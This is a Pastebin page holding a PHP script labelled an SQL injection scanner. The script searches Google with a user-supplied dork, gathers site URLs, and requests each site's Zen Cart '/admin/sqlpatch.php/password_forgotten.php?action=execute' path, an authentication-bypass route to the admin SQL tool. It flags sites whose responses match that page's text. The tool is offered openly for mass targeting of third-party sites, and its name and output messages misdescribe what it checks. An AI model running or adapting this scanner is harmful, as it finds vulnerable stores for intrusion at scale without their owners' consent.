API tools faq
paste
Advertisement
intifadha

[PHP] SQL Injection Scanner

intifadha
Feb 7th, 2012
1,518
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * SQL Injection Scanner
  4. * PHP Version By XShimeX
  5. * Version 1.0
  6. * Thanks To: TBDSecurity.Com, <b style="color:black;background-color:#ffff66">HMSecurity</b>.org, All my friends, And ALLAH.
  7. */
  8. set_time_limit(0);
  9.  
  10. $vuln = 0;
  11. $not_vuln = 0;
  12. $total = 0;
  13.  
  14. print "[+] SQL Injection Scanner PHP Version\n";
  15. print "[+] Version 1.0 By XShimeX\n";
  16.  
  17. if(!$argv[1]) {
  18. print "[%] Usage: $argv[0] <dork>\n";
  19. print "[%] Example : $argv[0] inurl:news.php?id=\n";
  20. exit;
  21. }
  22.  
  23. /**
  24. * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
  25. */
  26.  
  27. $bug = array(
  28. 'If you are installing 3rd-party contributions, note that you do so at your own risk',
  29. 'BE SURE TO DO A FULL DATABASE BACKUP BEFORE RUNNING SCRIPTS HERE',
  30. 'Zen Cartβ„’ makes no warranty as to the safety of scripts supplied by 3rd-party contributors. Test before using on your live database',
  31. 'NOTE: Zen Cart database-upgrade scripts should NOT be run from this page',
  32. 'Please upload the new zc_install folder and run the upgrade from there instead for better reliability'
  33. );
  34.  
  35. print "[@] Start Finding Links...\n";
  36. for($i = 0; $i <= 900; $i += 10) {
  37. $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=10&hl=en&as_qdr=all&start=$i&sa=N");
  38. @preg_match_all("/<h3 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $fp, $links);
  39. $url[] = $links[2];
  40. }
  41. print "[@] Done Finding Links...\n";
  42. print "[@] Now searching for Vulnerable\n";
  43. foreach($url as $key) {
  44. foreach($key as $value) {
  45. $fp = @file_get_contents($value."/admin/sqlpatch.php/password_forgotten.php?action=execute");
  46. foreach($bug as $error) {
  47. if(@preg_match("/$error/", $fp)) {
  48. print "[#] zen cart error: $value'\n";
  49. $vuln++;
  50. } else {
  51. $not_vuln++;
  52. }
  53. $total++;
  54. }
  55. }
  56. }
  57. print "[@] Done Scanning\n";
  58. print "[%] Result\n";
  59. print "[-] Total Vulnerable: $vuln\n";
  60. print "[-] Total Not Vulnerable : $not_vuln\n";
  61. print "[-] Total scanned Website: $total\n";
  62. print "Enjoy :)\n";
  63.  
  64. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!